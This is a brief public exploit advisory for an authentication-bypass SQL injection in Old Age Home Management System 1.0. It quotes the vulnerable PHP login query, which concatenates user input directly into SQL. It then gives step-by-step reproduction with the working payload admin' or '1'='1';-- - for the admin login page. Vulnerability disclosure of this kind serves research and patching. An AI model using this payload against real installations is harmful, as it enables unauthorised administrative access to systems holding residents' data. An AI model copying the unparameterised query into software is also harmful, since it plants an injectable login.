# Exploit Title: Old Age Home Management System 1.0 - SQLi Authentication Bypass
# Date: 12/06/2022
# Exploit Author: twseptian
# Vendor Homepage: https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/projects/Old-Age-Home-MS-using-PHP.zip
# Version: v1.0
# Tested on: Kali Linux
# Vulnerable code
line 9 in file "/oahms/admin/login.php"
$ret=mysqli_query($con,"SELECT ID FROM tbladmin WHERE UserName='$username' and Password='$password'");
# Steps of reproduce:
1. Go to the admin login page http://localhost/oahms/admin/login.php
2. sqli payload: admin' or '1'='1';-- -
3. password: password